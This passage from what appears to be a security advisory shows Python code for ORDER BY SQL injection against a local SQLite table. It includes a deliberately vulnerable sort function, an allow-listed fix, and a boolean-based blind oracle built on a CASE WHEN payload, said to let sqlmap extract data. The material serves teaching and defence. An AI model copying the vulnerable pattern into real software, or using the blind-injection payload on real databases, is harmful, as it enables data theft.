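        INSERT INTO files VALUES (1, 'zeta.txt',  '2023-04-01');
        INSERT INTO files VALUES (2, 'alpha.txt', '2023-04-02');
        INSERT INTO files VALUES (3, 'mid.txt',   '2023-04-03');
    """)
    return con


def list_files_vulnerable(column, direction='DESC'):
    """The flaw: sort parameters pasted straight into ORDER BY, as the advisory's payloads require."""
    sql = f"SELECT id FROM files ORDER BY {column} {direction}"
    return [row[0] for row in _db().execute(sql)]


def list_files_fixed(column, direction='DESC'):
    """ORDER BY cannot be parameterised, so allow-list both values before interpolating."""
    direction = direction.upper()
    if column not in ALLOWED_COLUMNS or direction not in ALLOWED_DIRECTIONS:
        raise ValueError('invalid sort parameter')
    sql = f'SELECT id FROM files ORDER BY "{column}" {direction}'
    return [row[0] for row in _db().execute(sql)]


def blind_oracle(condition):
    """
    Boolean-based blind probe through the vulnerable sort: when `condition` is true the
    rows come back ordered by name, otherwise by id, so comparing against the baseline
    ordering leaks one bit per request (the same trick as the CASE WHEN payload above).
    """
    payload = f"(CASE WHEN ({condition}) THEN name ELSE id END)"
    return list_files_vulnerable(payload) != list_files_vulnerable('id')


def blocked_by_fix(column):
    """True when the allow-listed version rejects the value."""
    try:
        list_files_fixed(column)
    except ValueError:
        return True
    return False


if __name__ == '__main__':
    print('baseline      :', list_files_vulnerable('id'))
    print('oracle 1=1    :', blind_oracle('1=1'))
    print('oracle 1=2    :', blind_oracle('1=2'))
    print('fixed rejects :', blocked_by_fix("(CASE WHEN (1=1) THEN name ELSE id END)"))
```

Each call to blind_oracle answers one yes/no question about the database, which is all sqlmap needs to extract data character by character; the allow-list leaves no expression to evaluate, so the fixed listing answers only with the ordering the caller is entitled to request.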